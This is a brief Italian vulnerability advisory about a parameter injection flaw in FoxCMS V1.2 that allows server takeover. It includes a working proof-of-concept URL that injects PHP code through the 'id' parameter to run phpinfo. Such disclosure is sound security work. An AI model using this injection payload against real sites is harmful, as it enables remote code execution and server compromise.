
FOXCMS黔狐 - Vulnerabilità di iniezione dei parametri di servizio nel sistema di gestione dei contenuti
FoxCMS è un sistema di gestione di siti web gratuito, utilizzabile anche a livello commerciale e open source, basato su architettura PHP+MySQL. Il sistema di gestione dei contenuti FOXCMS黔狐 presenta una vulnerabilità di iniezione dei parametri di servizio, che un attaccante può sfruttare per ottenere il controllo del server.
FOXCMS黔狐 Content Management System V1.2
POC http://xx/images/index.html?id=%24{%40print(phpinfo())} Inserire il POC e accedere alla pagina vulnerabile; verranno mostrate le informazioni restituite dall'esecuzione del comando phpinfo.
